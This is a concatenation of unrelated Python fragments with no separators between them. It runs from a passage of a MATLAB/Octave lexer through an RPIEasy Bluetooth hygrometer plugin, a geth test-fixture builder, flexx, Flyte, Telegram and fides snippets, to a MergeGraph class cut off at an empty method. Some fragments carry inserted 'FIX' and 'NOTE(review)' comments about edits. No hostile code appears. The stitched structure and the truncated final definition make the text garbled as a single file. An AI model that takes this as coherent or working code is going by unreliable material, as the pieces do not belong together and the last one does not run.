            if (self.nc.isnumeric() or ((self.nc == '.') and self.nnc.isnumeric())):
                self.skip()
                self.lex_error()
        elif (self.cc.isnumeric() or ((self.cc == '.') and self.nc.isnumeric())):
            # Decimal/float literal, optionally with exponent and imaginary
            # suffix (i/j).
            kind = 'NUMBER'
            tmp = self.match_re('([0-9]+(\\.[0-9]*)?([eE][+-]?[0-9]+)?[iIjJ]?)|(\\.[0-9]+([eE][+-]?[0-9]+)?[iIjJ]?)')
            if tmp.endswith('.'):
                # A trailing '.' may actually start an operator like '.*';
                # only consume it when it cannot.
                self.advance((len(tmp) - 2))
                if (self.nnc not in ('/', '\\', '*', "'", '^')):
                    self.skip()
            else:
                self.advance((len(tmp) - 1))
            if (self.nc.isnumeric() or ((self.nc == '.') and self.nnc.isnumeric())):
                self.skip()
                self.lex_error()
        elif ((self.cc in ('<', '>', '=', '~')) or ((self.cc == '!') and self.language.bang_is_negation)):
            if (self.nc == '='):
                self.skip()
                kind = 'OPERATOR'  # <=, >=, ==, ~=, !=
            elif (self.cc == '='):
                kind = 'ASSIGNMENT'
            else:
                kind = 'OPERATOR'
        elif (self.cc in ('+', '-', '*', '/', '^', '\\')):
            kind = 'OPERATOR'
        elif (self.cc in ('&', '|')):
            kind = 'OPERATOR'
            if (self.nc == self.cc):
                self.skip()  # && or ||
        elif ((self.cc == '.') and (self.nc in ('*', '/', '\\', '^', "'"))):
            kind = 'OPERATOR'  # element-wise operators and .'
            self.skip()
        elif ((self.cc == '.') and (self.nc == '?') and self.language.has_nvp_delegate):
            kind = 'NVP_DELEGATE'
            self.skip()
        elif (self.cc == "'"):
            # Disambiguate transpose from a character-array literal based on
            # the preceding token and whitespace.
            kind = None
            if (preceeding_ws or self.first_in_line):
                kind = 'CARRAY'
                contains_quotes = True
            elif (self.last_kind in ('IDENTIFIER', 'NUMBER', 'KET', 'M_KET', 'C_KET')):
                kind = 'OPERATOR'
            elif ((self.last_kind == 'OPERATOR') and (self.last_value in (".'", "'"))):
                kind = 'OPERATOR'
            elif (self.last_kind in ('BRA', 'M_BRA', 'C_BRA', 'COMMA', 'CARRAY', 'ASSIGNMENT', 'OPERATOR', 'SEMICOLON', 'COLON', 'KEYWORD')):
                kind = 'CARRAY'
                contains_quotes = True
            else:
                self.lex_error('unable to distinguish between string and transpose operation')
            if (kind == 'CARRAY'):
                while True:
                    self.skip()
                    if ((self.cc == "'") and (self.nc == "'")):
                        self.skip()  # escaped quote
                    elif (self.cc == "'"):
                        break
                    elif (self.cc in ('\n', '\x00')):
                        self.lex_error()
        elif (self.cc == '"'):
            kind = 'STRING'
            contains_quotes = True
            while True:
                self.skip()
                if ((self.cc == '"') and (self.nc == '"')):
                    self.skip()  # escaped quote
                elif (self.cc == '"'):
                    break
                elif (self.cc in ('\n', '\x00')):
                    self.lex_error()
        elif (self.cc == ','):
            kind = 'COMMA'
        elif (self.cc == ':'):
            kind = 'COLON'
        elif (self.cc == '('):
            kind = 'BRA'
        elif (self.cc == ')'):
            kind = 'KET'
        elif (self.cc == '{'):
            kind = 'C_BRA'
        elif (self.cc == '}'):
            kind = 'C_KET'
        elif (self.cc == '['):
            kind = 'M_BRA'
        elif (self.cc == ']'):
            kind = 'M_KET'
        elif (self.cc == '.'):
            kind = 'SELECTION'
        elif (self.cc == '@'):
            # FIX: the comparison had degenerated to '' (never true, cc is
            # always exactly one character); '@' introduces function handles
            # and anonymous functions, cf. the AT/in_lambda handling below.
            kind = 'AT'
        elif ((self.cc == '!') and (not self.language.bang_is_negation)):
            # Shell-escape line.
            while (self.nc not in ('\n', '\x00')):
                self.skip()
            kind = 'BANG'
        elif (self.cc == '?'):
            kind = 'METACLASS'
        else:
            self.lex_error()
        t_end = self.lexpos
        col_end = (t_end - self.col_offset)
        raw_text = self.text[t_start:(t_end + 1)]
        # Keyword classification (never after a '.' selection).
        if ((kind == 'IDENTIFIER') and (self.last_kind != 'SELECTION')):
            if (self.in_annotation and (raw_text in self.language.annotation_keywords)):
                kind = 'KEYWORD'
            elif ((not self.in_annotation) and (raw_text in self.language.keywords)):
                kind = 'KEYWORD'
        # Track block structure (only outside brackets) to recognize
        # context-sensitive keywords such as 'properties' or 'arguments'.
        if (not self.bracket_stack):
            if ((kind == 'KEYWORD') and (raw_text in ('classdef', 'function', 'for', 'if', 'parfor', 'switch', 'try', 'while', 'spmd'))):
                self.block_stack.append(raw_text)
            if (self.block_stack and (kind == 'IDENTIFIER')):
                extra_kw = set()
                if (self.last_kind == 'SELECTION'):
                    pass
                elif (self.block_stack[(- 1)] == 'classdef'):
                    extra_kw = self.language.class_keywords
                elif ((self.block_stack[(- 1)] != 'methods') and (self.block_stack[(- 1)] in self.language.class_keywords)):
                    extra_kw = self.language.class_keywords
                elif (self.block_stack[(- 1)] == 'function'):
                    extra_kw = self.language.function_contract_keywords
                if (raw_text in extra_kw):
                    kind = 'KEYWORD'
                    self.block_stack.append(raw_text)
            elif ((kind == 'KEYWORD') and (raw_text == 'end') and self.first_in_statement):
                if self.block_stack:
                    self.block_stack.pop()
                self.in_special_section = False
            if ((kind == 'KEYWORD') and (raw_text in ('properties', 'events', 'enumeration', 'arguments'))):
                self.in_special_section = True
        if ((self.line - 1) < len(self.context_line)):
            ctx_line = self.context_line[(self.line - 1)]
        else:
            raise ICE(('line is larger than the length of the file %s' % self.filename))
        token = m_ast.MATLAB_Token(self.language, kind, raw_text,
                                   Location(filename=self.filename,
                                            blockname=self.blockname,
                                            line=self.line,
                                            col_start=col_start,
                                            col_end=col_end,
                                            context=ctx_line),
                                   self.first_in_line,
                                   self.first_in_statement,
                                   value=value,
                                   contains_quotes=contains_quotes,
                                   block_comment=(self.block_comment > 0),
                                   annotation=self.in_annotation)
        self.first_in_line = False
        self.first_in_statement = False
        if ((kind == 'BRA') and (self.last_kind == 'AT')):
            # Entering the parameter list of an anonymous function @(...).
            self.in_lambda = True
        if (kind == 'NEWLINE'):
            self.line += token.raw_text.count('\n')
            self.first_in_line = True
            self.in_annotation = False
        elif (kind == 'CONTINUATION'):
            self.line += 1
            self.first_in_line = True
        # Command-form detection: an identifier starting a statement,
        # followed by whitespace and something that cannot be an expression
        # continuation, switches the lexer into command mode.
        if (self.language.allow_command_form and (not self.in_special_section) and (not self.in_annotation) and token.first_in_statement and (token.kind == 'IDENTIFIER') and (self.nc in (' ', '\t'))):
            mode = 'search_ws'
            for (n, c) in enumerate(self.text[(self.lexpos + 1):], (self.lexpos + 1)):
                if (mode == 'search_ws'):
                    if (c == '\n'):
                        break
                    elif (c in (' ', '\t')):
                        pass
                    elif (c == '('):
                        break
                    elif (c == ')'):
                        self.advance((n - self.lexpos))
                        self.lex_error('MATLAB/Octave cannot process command starting with )')
                    elif (c in "+-*/\\^'?:"):
                        mode = 'found_op'
                    elif (c in '<>&|~.='):
                        # Two-character operators need one more lookahead.
                        if ((c == '.') and (self.text[n:(n + 3)] == '...')):
                            break
                        elif ((n + 1) < len(self.text)):
                            nc = self.text[(n + 1)]
                        else:
                            break
                        if ((c == '<') and (nc == '=')):
                            mode = 'skip_one'
                        elif ((c == '>') and (nc == '=')):
                            mode = 'skip_one'
                        elif ((c == '&') and (nc == '&')):
                            mode = 'skip_one'
                        elif ((c == '|') and (nc == '|')):
                            mode = 'skip_one'
                        elif ((c == '~') and (nc == '=')):
                            mode = 'skip_one'
                        elif ((c == '.') and (nc in "*/\\&'?")):
                            mode = 'skip_one'
                        elif ((c == '=') and (nc == '=')):
                            mode = 'skip_one'
                        elif (c == '='):
                            break
                        else:
                            mode = 'found_op'
                    else:
                        self.command_mode = True
                        break
                elif (mode == 'skip_one'):
                    mode = 'found_op'
                elif (mode == 'found_op'):
                    # Operator followed by whitespace -> expression;
                    # operator glued to the next word -> command form.
                    if (c in (' ', '\t')):
                        break
                    else:
                        self.command_mode = True
                        break
                else:
                    raise ICE('logic error')
        # Statement boundaries (only meaningful outside brackets).
        if (not self.bracket_stack):
            if ((kind in ('NEWLINE', 'COMMA', 'SEMICOLON')) or ((token.kind == 'KEYWORD') and (token.value == 'try'))):
                self.first_in_statement = True
                self.command_mode = False
        # Block comment open/close bookkeeping, with style checks for
        # markers that MATLAB silently ignores.
        if ((token.kind == 'COMMENT') and (((self.block_comment == 0) and (token.raw_text[1:2] == '{')) or ((self.block_comment > 0) and self.contains_block_open(token.raw_text)))):
            if ((not token.first_in_line) and (self.block_comment == 0)):
                self.mh.check(token.location, 'ignored block comment: it must not be preceded by program text', 'ignored_block_comment', 'low')
            elif ((token.value.strip() != '{') and (self.block_comment == 0)):
                self.mh.check(token.location, 'ignored block comment: no text must appear after the {', 'ignored_block_comment', 'low')
            elif (token.raw_text.strip() not in [('%s{' % c) for c in self.language.comment_chars]):
                self.mh.check(token.location, 'ignored block comment: no text must appear around the block comment marker', 'ignored_block_comment', 'low')
            else:
                self.block_comment += 1
                token.block_comment = True
        elif (self.block_comment and (token.kind == 'COMMENT')):
            for c in self.language.comment_chars:
                marker = (c + '}')
                if (marker in token.raw_text):
                    if (token.raw_text.strip() == marker):
                        self.block_comment -= 1
                        token.value = '}'
                    else:
                        self.mh.check(token.location, ('ignored block comment end: no text must appear around the block comment marker %s' % marker), 'ignored_block_comment', 'low')
        self.last_kind = kind
        self.last_value = raw_text
        # Bracket matching.
        if (token.kind in ('BRA', 'M_BRA', 'C_BRA')):
            self.bracket_stack.append(token)
        elif (token.kind in ('KET', 'M_KET', 'C_KET')):
            if self.bracket_stack:
                matching_bracket = self.bracket_stack.pop()
                if (((token.kind == 'KET') and (matching_bracket.kind != 'BRA')) or ((token.kind == 'M_KET') and (matching_bracket.kind != 'M_BRA')) or ((token.kind == 'C_KET') and (matching_bracket.kind != 'C_BRA'))):
                    self.mh.lex_error(token.location, ('mismatched brackets %s ... %s' % (matching_bracket.raw_text, token.raw_text)))
            else:
                self.mh.lex_error(token.location, ('unmatched %s' % token.raw_text), False)
        # Anonymous comma insertion: inside [] or {} literals, whitespace
        # between elements separates them.  Look ahead (across '...'
        # continuations) to decide whether the next text starts a new
        # element.
        ws_is_significant = ((not self.language.ws_insignificant) and self.bracket_stack and (self.bracket_stack[(- 1)].kind in ('M_BRA', 'C_BRA')) and (self.bracket_stack[(- 1)] != token))
        ws_follows = (self.nc in (' ', '\t'))
        skip_cont = False
        next_non_ws = None
        after_next_non_ws = None
        for (n, c) in enumerate(self.text[(self.lexpos + 1):], (self.lexpos + 1)):
            if (skip_cont and (c == '\n')):
                skip_cont = False
            elif skip_cont:
                pass
            elif ((c in (' ', '\t')) and (next_non_ws is None)):
                pass
            elif ((self.text[n:(n + 3)] == '...') and (next_non_ws is None)):
                skip_cont = True
                ws_follows = True
            elif (next_non_ws is None):
                next_non_ws = c
            else:
                after_next_non_ws = c
                break
        # Only tokens that can end an expression may be followed by an
        # implicit comma.
        token_relevant = ((token.kind in ('IDENTIFIER', 'NUMBER', 'CARRAY', 'STRING', 'KET', 'M_KET', 'C_KET')) or ((token.kind == 'KEYWORD') and (token.value == 'end')) or ((token.kind == 'OPERATOR') and (token.value in ("'", ".'"))))
        if (next_non_ws and after_next_non_ws):
            if ((next_non_ws == '.') and after_next_non_ws.isdigit()):
                pass  # e.g. '.5' starts a number
            elif (next_non_ws in '*/\\^<>&|=.:!'):
                token_relevant = False  # binary operator continues the expression
            elif ((next_non_ws == '~') and (after_next_non_ws == '=')):
                token_relevant = False
        if (ws_is_significant and ws_follows and next_non_ws and token_relevant):
            if (next_non_ws in (',', ';', '\n')):
                pass
            elif (next_non_ws in self.language.comment_chars):
                pass
            elif next_non_ws.isalnum():
                self.add_comma = True
            elif (next_non_ws in ("'", '"')):
                self.add_comma = True
            elif (next_non_ws in '([{'):
                self.add_comma = True
            elif (next_non_ws in '?'):
                self.add_comma = True
            elif (next_non_ws == '.'):
                self.add_comma = True
            elif (next_non_ws in '-+~'):
                # Unary sign/negation only starts a new element when glued
                # to the operand.
                if (after_next_non_ws in ('+', '-', '(', '[', '.', '~')):
                    self.add_comma = True
                elif after_next_non_ws.isalnum():
                    self.add_comma = True
        if (self.in_lambda and (token.kind == 'KET')):
            # Closing the @(...) parameter list never needs a comma.
            self.add_comma = False
            self.in_lambda = False
        return token

    def token(self):
        """Public token stream.

        Wraps __token() to re-classify a statement-initial '[' ... ']' pair
        that is followed by '=' into A_BRA/A_KET (multi-assignment target),
        buffering the lookahead tokens in delay_list.
        """
        if self.delay_list:
            tok = self.delay_list.pop(0)
            return tok
        tok = self.__token()
        if (tok is None):
            return None
        # Only a top-level '[' can open an assignment target list.
        if ((len(self.bracket_stack) > 1) or (tok.kind != 'M_BRA')):
            return tok
        open_bracket = tok
        if (open_bracket.kind != 'M_BRA'):
            raise ICE(('supposed open bracket is %s instead' % open_bracket.kind))
        # Buffer everything up to the matching close bracket.
        self.delay_list = [tok]
        while self.bracket_stack:
            tok = self.__token()
            self.delay_list.append(tok)
            if (tok is None):
                break
        close_bracket = self.delay_list[(- 1)]
        if ((close_bracket is not None) and (close_bracket.kind != 'M_KET')):
            raise ICE(('supposed close bracket is %s instead' % close_bracket.kind))
        # Look past continuations for the token after the close bracket.
        while close_bracket:
            tok = self.__token()
            self.delay_list.append(tok)
            if (tok is None):
                break
            elif (tok.kind == 'CONTINUATION'):
                continue
            else:
                break
        tok = self.delay_list[(- 1)]
        if (tok and (tok.kind == 'ASSIGNMENT')):
            # '[a, b] = ...': re-classify the brackets.
            open_bracket.kind = 'A_BRA'
            close_bracket.kind = 'A_KET'
        tok = self.delay_list.pop(0)
        return tok
class Plugin(plugin.PluginProto):
    """RPIEasy task plugin 518: reads temperature/humidity notifications from
    a Xiaomi ClearGrass CGG1 hygrometer over Bluetooth LE (bluepy).

    Connection handling runs in a background thread (connectproc); incoming
    notification values are buffered in TARR/HARR and served by plugin_read.
    """
    PLUGIN_ID = 518
    PLUGIN_NAME = 'Environment - BLE Xiaomi CGG1 Hygrometer (EXPERIMENTAL)'
    PLUGIN_VALUENAME1 = 'Temperature'
    PLUGIN_VALUENAME2 = 'Humidity'
    PLUGIN_VALUENAME3 = 'Battery'

    def __init__(self, taskindex):
        """Set plugin capability flags and BLE connection state defaults."""
        plugin.PluginProto.__init__(self, taskindex)
        self.dtype = rpieGlobals.DEVICE_TYPE_BLE
        self.vtype = rpieGlobals.SENSOR_TYPE_TEMP_HUM
        self.valuecount = 2
        self.senddataoption = True
        self.recdataoption = False
        self.timeroption = True
        self.timeroptional = True
        self.connected = False
        self.formulaoption = True
        self.BLEPeripheral = False      # bluepy Peripheral once connected
        self.cproc = False              # background connection thread
        self.waitnotifications = False
        self.conninprogress = False
        self.readinprogress = False
        self.battery = 0
        self.lastbatteryreq = 0
        # Start connecting this many milliseconds before data is due.
        self.preread = 4000
        self._lastdataservetime = 0
        self._nextdataservetime = 0
        self.TARR = []                  # buffered temperature readings
        self.HARR = []                  # buffered humidity readings
        self.failures = 0
        self.lastrequest = 0
        self.blestatus = None           # shared BLEStatus for the HCI device

    def webform_load(self):
        """Render the task configuration form (HCI device + MAC address)."""
        bledevs = BLEHelper.find_hci_devices()
        options = []
        optionvalues = []
        if bledevs:
            for bd in bledevs:
                options.append(bd)
                try:
                    # 'hciN' -> N; fall back to the raw suffix if non-numeric.
                    optionvalues.append(int(bd[3:]))
                except:
                    optionvalues.append(bd[3:])
        webserver.addFormSelector('Local Device', 'plugin_518_dev', len(options), options, optionvalues, None, int(self.taskdevicepluginconfig[2]))
        webserver.addFormTextBox('Device Address', 'plugin_518_addr', str(self.taskdevicepluginconfig[0]), 20)
        webserver.addFormNote("Enable blueetooth then <a href='blescanner'>scan 'ClearGrass Temp & RH'</a> first.")
        return True

    def webform_save(self, params):
        """Persist form values (config[0]=MAC, config[2]=HCI index) and re-init."""
        self.taskdevicepluginconfig[0] = str(webserver.arg('plugin_518_addr', params)).strip().lower()
        try:
            self.taskdevicepluginconfig[2] = int(webserver.arg('plugin_518_dev', params))
        except:
            self.taskdevicepluginconfig[2] = 0
        self.plugin_init()
        return True

    def plugin_init(self, enableplugin=None):
        """Reset connection state and schedule the first data read."""
        plugin.PluginProto.plugin_init(self, enableplugin)
        self.readinprogress = False
        self.connected = False
        self.conninprogress = False
        self.waitnotifications = False
        self.lastrequest = 0
        self.TARR = []
        self.HARR = []
        # Older task objects may predate the preread attribute.
        try:
            if self.preread:
                pass
        except:
            self.preread = 4000
        self.uservar[0] = 0
        self.uservar[1] = 0
        if self.enabled:
            self.ports = str(self.taskdevicepluginconfig[0])
            self.timer1s = True
            self.battery = (- 1)
            self._nextdataservetime = (rpieTime.millis() - self.preread)
            self._lastdataservetime = 0
            self.failures = 0
            # Pretend the last serve was (interval-2)s ago so the first
            # real read happens shortly after init.
            self._lastdataservetime = (rpieTime.millis() - ((self.interval - 2) * 1000))
            # config[1] toggles reporting the battery as a third value.
            # NOTE(review): nothing in this chunk sets config[1]; confirm
            # it is configurable elsewhere.
            if self.taskdevicepluginconfig[1]:
                self.valuecount = 3
                self.vtype = rpieGlobals.SENSOR_TYPE_TRIPLE
            else:
                self.valuecount = 2
                self.vtype = rpieGlobals.SENSOR_TYPE_TEMP_HUM
            try:
                devnum = int(self.taskdevicepluginconfig[2])
                self.blestatus = BLEHelper.BLEStatus[devnum]
            except:
                pass
        else:
            self.ports = ''
            self.timer1s = False

    def timer_once_per_second(self):
        """Kick off a background connection when the next read is near."""
        if self.enabled:
            # Within preread ms of the next scheduled serve time?
            if ((self._nextdataservetime - rpieTime.millis()) <= self.preread):
                if ((self.conninprogress == False) and (self.connected == False)):
                    self.waitnotifications = False
                    self.blestatus.unregisterdataprogress(self.taskindex)
                    # A valid MAC address is at least 11 chars long.
                    if (len(self.taskdevicepluginconfig[0]) > 10):
                        self.cproc = threading.Thread(target=self.connectproc)
                        self.cproc.daemon = True
                        self.cproc.start()
        return self.timer1s

    def plugin_read(self):
        """Serve the newest buffered readings, or poke the connection.

        NOTE(review): `result` is initialised but the method never returns
        it (implicitly returns None); confirm against the PluginProto
        contract used elsewhere.
        """
        result = False
        if self.enabled:
            if ((len(self.TARR) > 0) and (len(self.HARR) > 0)):
                try:
                    # Use the most recent buffered values.
                    self.set_value(1, self.TARR[(- 1)], False)
                    self.set_value(2, self.HARR[(- 1)], False)
                    self.plugin_senddata()
                    self._lastdataservetime = rpieTime.millis()
                    self._nextdataservetime = ((self._lastdataservetime + (self.interval * 1000)) - self.preread)
                    self.failures = 0
                except:
                    pass
                # For long intervals, drop the link between reads.
                if (self.interval > 10):
                    self.disconnect()
                self.TARR = []
                self.HARR = []
            elif (self._nextdataservetime < rpieTime.millis()):
                # Overdue with no data: re-check/refresh the connection.
                self.isconnected()

    def connectproc(self):
        """Background thread: wait for a free BLE line, then connect."""
        try:
            # Never connect while a scan is running; ask it to stop instead.
            if self.blestatus.isscaninprogress():
                self.blestatus.requeststopscan(self.taskindex)
                return False
        except Exception as e:
            return False
        self.conninprogress = True
        # Wait until no other task is using the adapter.
        while ((self.blestatus.norequesters() == False) or (self.blestatus.nodataflows() == False)):
            time.sleep(0.5)
            misc.addLog(rpieGlobals.LOG_LEVEL_DEBUG, ('BLE line not free for P518! ' + str(self.blestatus.dataflow)))
        self.blestatus.registerdataprogress(self.taskindex)
        prevstate = self.connected
        try:
            misc.addLog(rpieGlobals.LOG_LEVEL_DEBUG, ('BLE connection initiated to ' + str(self.taskdevicepluginconfig[0])))
            # Random jitter reduces collisions with other BLE tasks.
            time.sleep(uniform(0.4, 1.8))
            self.BLEPeripheral = btle.Peripheral(str(self.taskdevicepluginconfig[0]), iface=self.taskdevicepluginconfig[2])
            self.connected = True
            self.failures = 0
            self.BLEPeripheral.setDelegate(TempHumDelegateC1(self.callbackfunc))
        except Exception as e:
            self.connected = False
            self.isconnected()
        if (self.connected == False):
            misc.addLog(rpieGlobals.LOG_LEVEL_DEBUG, ('BLE connection failed ' + str(self.taskdevicepluginconfig[0])))
            self.blestatus.unregisterdataprogress(self.taskindex)
            self.conninprogress = False
            try:
                self.disconnect()
            except:
                pass
            time.sleep(uniform(1, 3))
            self.failures = (self.failures + 1)
            # After repeated failures, back off before trying again.
            if (self.failures > 5):
                if (self.interval < 120):
                    skiptime = (self.interval * 5000)
                else:
                    skiptime = self.interval
                self._nextdataservetime = (rpieTime.millis() + skiptime)
                self._lastdataservetime = self._nextdataservetime
            return False
        else:
            misc.addLog(rpieGlobals.LOG_LEVEL_DEBUG, ('BLE connected to ' + str(self.taskdevicepluginconfig[0])))
            self.waitnotifications = True
        time.sleep(0.1)
        self.blestatus.unregisterdataprogress(self.taskindex)
        self.conninprogress = False

    def request_temp_hum_value(self, d=None):
        """Enable sensor notifications by writing 1 to the CCC descriptor.

        Rate-limited to once per 2 seconds; returns True on success (or
        when skipped by the rate limit), False on BLE failure.
        """
        res = False
        if ((time.time() - self.lastrequest) > 2):
            self.lastrequest = time.time()
            try:
                ch = self.BLEPeripheral.getCharacteristics(uuid=CGG_DATA)[0]
                # 0x2902 (10498) = Client Characteristic Configuration.
                desc = ch.getDescriptors(forUUID=10498)[0]
                desc.write(1 .to_bytes(2, byteorder='little'), withResponse=True)
                res = True
            except Exception as e:
                self.blestatus.unregisterdataprogress(self.taskindex)
                res = False
                self.failures += 1
        else:
            res = True
        return res

    def isconnected(self, d=None):
        """Probe the link by re-requesting notifications; update state."""
        if self.connected:
            self.connected = self.request_temp_hum_value()
        return self.connected

    def get_battery_value(self):
        # Battery readout is not implemented for this device.
        return (- 1)

    def callbackfunc(self, temp=None, hum=None):
        """Notification delegate callback: buffer one temp/hum sample."""
        self.connected = True
        self.blestatus.unregisterdataprogress(self.taskindex)
        if self.enabled:
            self.TARR.append(temp)
            self.HARR.append(hum)
            # Throttle serving to at most once per 2 seconds.
            if ((rpieTime.millis() - self._lastdataservetime) >= 2000):
                self.plugin_read()

    def disconnect(self):
        """Tear down the BLE link and stop the connection thread."""
        self.connected = False
        self.waitnotifications = False
        if self.enabled:
            try:
                self.blestatus.unregisterdataprogress(self.taskindex)
                if (self.BLEPeripheral is not None):
                    self.BLEPeripheral.disconnect()
                # NOTE(review): Thread._stop() is a private CPython API and
                # may raise/no-op on modern Pythons; errors are swallowed.
                self.cproc._stop()
            except:
                pass

    def plugin_exit(self):
        self.disconnect()
def generate_go_ethereum_fixture(destination_dir):
    """Build a reusable geth chain fixture and archive it as a zip.

    Starts geth once to populate chain state, restarts it to verify the
    state survives a restart, writes the connection config next to the
    datadir, and finally zips the datadir to ``destination_dir``.
    """
    with contextlib.ExitStack() as stack:
        datadir = stack.enter_context(common.tempdir())
        # Pre-seed the keystore with the test account's key file.
        keystore_dir = os.path.join(datadir, 'keystore')
        common.ensure_path_exists(keystore_dir)
        keyfile_path = os.path.join(keystore_dir, common.KEYFILE_FILENAME)
        with open(keyfile_path, 'w') as keyfile:
            keyfile.write(common.KEYFILE_DATA)
        genesis_file_path = os.path.join(datadir, 'genesis.json')
        with open(genesis_file_path, 'w') as genesis_file:
            genesis_file.write(json.dumps(common.GENESIS_DATA))
        # IPC socket lives in its own tempdir to keep the path short.
        geth_ipc_path_dir = stack.enter_context(common.tempdir())
        geth_ipc_path = os.path.join(geth_ipc_path_dir, 'geth.ipc')
        geth_port = get_open_port()
        geth_binary = common.get_geth_binary()
        # First run: create the chain state.
        with get_geth_process(geth_binary=geth_binary, datadir=datadir, genesis_file_path=genesis_file_path, geth_ipc_path=geth_ipc_path, geth_port=geth_port):
            common.wait_for_socket(geth_ipc_path)
            w3 = Web3(Web3.IPCProvider(geth_ipc_path))
            chain_data = setup_chain_state(w3)
            verify_chain_state(w3, chain_data)
        # Second run: confirm the recorded state persists across restarts.
        with get_geth_process(geth_binary=geth_binary, datadir=datadir, genesis_file_path=genesis_file_path, geth_ipc_path=geth_ipc_path, geth_port=geth_port):
            common.wait_for_socket(geth_ipc_path)
            w3 = Web3(Web3.IPCProvider(geth_ipc_path))
            verify_chain_state(w3, chain_data)
        static_data = {'raw_txn_account': common.RAW_TXN_ACCOUNT, 'keyfile_pw': common.KEYFILE_PW}
        config = merge(chain_data, static_data)
        pprint.pprint(config)
        write_config_json(config, datadir)
        # Archive while the ExitStack still holds the tempdirs open.
        shutil.make_archive(destination_dir, 'zip', datadir)
def test_flexx_in_thread4():
    """A server created in the main thread cannot be started elsewhere.

    First try_start runs in a fresh thread against the main-thread server
    and must fail; main() then creates a server bound to its own loop, so
    its try_start succeeds.
    """
    res = []
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    # Server bound to the main thread's loop.
    app.create_server()

    def try_start():
        # Record whether app.start() is permitted from this thread.
        try:
            app.stop()
            app.start()
        except RuntimeError:
            res.append('start-fail')
        else:
            res.append('start-ok')

    def main():
        # Re-create the server with a loop owned by this thread, after
        # which starting from here is allowed.
        app.create_server(loop=asyncio.new_event_loop())
        try_start()

    # Starting the main-thread server from another thread must fail.
    t = threading.Thread(target=try_start)
    t.start()
    t.join()
    t = threading.Thread(target=main)
    t.start()
    t.join()
    assert (res == ['start-fail', 'start-ok'])
class Resources(_common.FlyteIdlEntity):
    """Compute resource requests and limits; wraps the flyteidl
    ``Resources`` protobuf message."""

    class ResourceName(object):
        # Mirror of the protobuf resource-name enum values.
        UNKNOWN = _core_task.Resources.UNKNOWN
        CPU = _core_task.Resources.CPU
        GPU = _core_task.Resources.GPU
        MEMORY = _core_task.Resources.MEMORY
        STORAGE = _core_task.Resources.STORAGE
        EPHEMERAL_STORAGE = _core_task.Resources.EPHEMERAL_STORAGE

    class ResourceEntry(_common.FlyteIdlEntity):
        def __init__(self, name, value):
            """
            :param name: a ResourceName enum value
            :param value: textual quantity such as "100m" or "1Gi"
            """
            self._name = name
            self._value = value

        # The @property accessors are required: to_flyte_idl reads
        # self.name / self.value as attributes, which would otherwise be
        # bound methods rather than the stored values.
        @property
        def name(self):
            return self._name

        @property
        def value(self):
            return self._value

        def to_flyte_idl(self):
            """Serialize to the protobuf ResourceEntry message."""
            return _core_task.Resources.ResourceEntry(name=self.name, value=self.value)

        @classmethod
        def from_flyte_idl(cls, pb2_object):
            """Build a ResourceEntry from its protobuf message."""
            return cls(name=pb2_object.name, value=pb2_object.value)

    def __init__(self, requests, limits):
        """
        :param requests: list of ResourceEntry requested for the task
        :param limits: list of ResourceEntry hard limits for the task
        """
        self._requests = requests
        self._limits = limits

    @property
    def requests(self):
        return self._requests

    @property
    def limits(self):
        return self._limits

    def to_flyte_idl(self):
        """Serialize to the protobuf Resources message."""
        return _core_task.Resources(requests=[r.to_flyte_idl() for r in self.requests], limits=[r.to_flyte_idl() for r in self.limits])

    @classmethod
    def from_flyte_idl(cls, pb2_object):
        """Build a Resources object from its protobuf message."""
        return cls(requests=[Resources.ResourceEntry.from_flyte_idl(r) for r in pb2_object.requests], limits=[Resources.ResourceEntry.from_flyte_idl(l) for l in pb2_object.limits])
def test_redis_handler_backend_register_next_step_handler(telegram_bot, private_chat, update_type):
    """Next-step handlers registered via the Redis backend must fire on the
    second update after /start registers them."""
    if (not REDIS_TESTS):
        pytest.skip('please install redis and configure redis server, then enable REDIS_TESTS')
    telegram_bot.next_step_backend = RedisHandlerBackend(prefix='pyTelegramBotApi:step_backend1')

    # The handler must actually be attached to the bot: the original bare
    # call discarded the decorator returned by message_handler, so `start`
    # was never registered and process_new_updates did nothing.
    @telegram_bot.message_handler(commands=['start'])
    def start(message):
        message.text = 'entered start'
        telegram_bot.register_next_step_handler_by_chat_id(message.chat.id, next_handler)

    telegram_bot.process_new_updates([update_type])
    assert (update_type.message.text == 'entered start')
    # Second update is routed to next_handler stored in Redis.
    telegram_bot.process_new_updates([update_type])
    assert (update_type.message.text == 'entered next_handler')
def create_router_factory(fides_model: FidesModelType, model_type: str) -> APIRouter:
    """Build an APIRouter exposing a Create endpoint for ``fides_model``.

    :param fides_model: pydantic model class served by the router
    :param model_type: URL segment / sql_model_map key for the resource
    :return: router with POST / registered
    """
    router = APIRouter(prefix=f'{API_PREFIX}/{model_type}', tags=[fides_model.__name__])

    # Registration must go through the decorator: a bare call expression
    # here would discard the route and leave the endpoint unreachable.
    @router.post(name='Create', path='/', response_model=fides_model, status_code=status.HTTP_201_CREATED, dependencies=[Security(verify_oauth_client_prod, scopes=[f'{CLI_SCOPE_PREFIX_MAPPING[model_type]}:{CREATE}'])], responses={status.HTTP_403_FORBIDDEN: {'content': {'application/json': {'example': {'detail': {'error': 'user does not have permission to modify this resource', 'resource_type': model_type, 'fides_key': 'example.key'}}}}}})
    async def create(resource: fides_model, db: AsyncSession=Depends(get_async_db)) -> Dict:
        """Create a resource row, validating Dataset data categories and
        refusing to overwrite default resources."""
        sql_model = sql_model_map[model_type]
        if isinstance(resource, Dataset):
            (await validate_data_categories(resource, db))
        if (isinstance(sql_model, ModelWithDefaultField) and resource.is_default):
            raise errors.ForbiddenError(model_type, resource.fides_key)
        return (await create_resource(sql_model, resource.dict(), db))

    return router
class MergeGraph(BaseGraph):
    """A graph produced by merging several adjacency mappings into one DAG."""

    def __init__(self, *args: Dict, input_classes: List):
        """
        :param args: adjacency mappings (node -> iterable of neighbours)
        :param input_classes: the graph classes this merge was built from
        """
        self._args = args
        self._input_classes = input_classes
        merged_dag = self._build()
        super().__init__(merged_dag, whoami='Merged Graph')

    @staticmethod
    def _merge_inputs(*args: Dict):
        """Union the neighbour sets of several adjacency dicts.

        Must be static: as a plain function in the class body, calling it
        via ``self._merge_inputs(...)`` passed the instance itself as the
        first "adjacency dict" and broke the merge with an AttributeError.
        """
        key_set = {k for arg in args for k in arg.keys()}
        super_dict = {k: set() for k in key_set}
        for arg in args:
            for (k, v) in arg.items():
                super_dict[k].update(v)
        return super_dict

    def nodes(self):
        """Return the input graph classes backing this merged graph."""
        return self._input_classes

    def _build(self) -> Dict:
